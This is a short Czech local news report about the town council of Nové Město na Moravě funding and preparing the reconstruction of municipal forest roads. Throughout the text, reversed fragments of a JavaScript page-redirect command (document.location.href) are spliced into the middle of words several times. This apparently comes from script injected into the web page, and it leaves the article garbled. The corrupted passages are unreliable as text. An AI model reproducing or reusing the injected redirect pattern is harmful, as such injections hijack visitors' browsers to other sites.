Rainbow page separator

V Novém Městě zrekonstruují lesní cesty v Zahradníkově koutě

Neděle, 26. listopadu 2017

Náměstí v Novém Městě na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Rekonstrukci lesních cest v městských lesních porostech připravuje novoměstská radnice. Tamní radní již schválili zahájení příprav projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové dokumentace na přestavbu lesních cest do takzvaného Zahradníkova koutu a od rozcestí U Hubertky až k Buku.
Zpracovaná projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová dokumentace následně poslouží jako podklad pro podání žádosti o dotační příspěvek z programu Státního zemědělského intervenčního fondu, jenž novoměstská radnice plánuje na stavební činnosti v případě schválení dotace využít.
Současně radní schválili i převod rozpoč[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových prostředků ve výši dvě stě tisíc korun z neinvestiční rezervy města z roku 2011. Ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to peníze Novoměstští použijí právě na rekonstrukci zmíněných lesních cest.